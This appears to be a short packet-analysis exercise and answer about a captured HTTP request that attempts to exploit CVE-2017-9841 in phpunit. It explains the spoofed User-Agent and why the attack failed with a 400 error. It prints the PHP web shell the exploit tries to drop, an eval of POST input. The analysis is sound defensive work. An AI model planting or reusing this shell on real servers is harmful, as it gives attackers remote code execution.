Got an HTTP request today for a change. See https://johannes.homepc.org/packet9.pcap . The host header is obfuscated, so do not consider it when answering the question:

Questions:

- Which vulnerability is this trying to exploit

The exploit is attacking CVE-2017-9841. This is (sort of) a vulnerability in phpunit. The reason I say "sort of" is that phpunit, a library to test PHP code, shouldn't really be installed on a production server, but it often is as developers try to not disrupt dependencies as they move code live. The problem was patched in november 2016, but no advisory was releleased unti later.

The exploit attempts to create a small php file, mysb.php with the following
content

<?php echo " tpshop"; 
eval($_POST[0]);
?>

This file can now be used to just find vulnerable sites, or as a simple shell.

- Why is the User-Agent spoofed (there are probably several answers here...)

The user agent clames to be Safari running on an Intel Mac OS X 10.6.8. First of all, this OS X version is very old. Secondly, I would expect at least an "Accept-Language" header. The "Accept" header should also be more complex.

- Did they attack work?

no. the server responded with a 400 error. 

- If the attack did not work: why?

The lines are not properly terminated. HTTP requires each header to conclude with a CR+LF. This request only uses a LF (or New Line, NL) only (0x0A). This used to work with older versions of Apache (pre 2.4.25). There is now a directive in Apache to relax it (HttpProtocolOptions), but by default it is set to "Strict".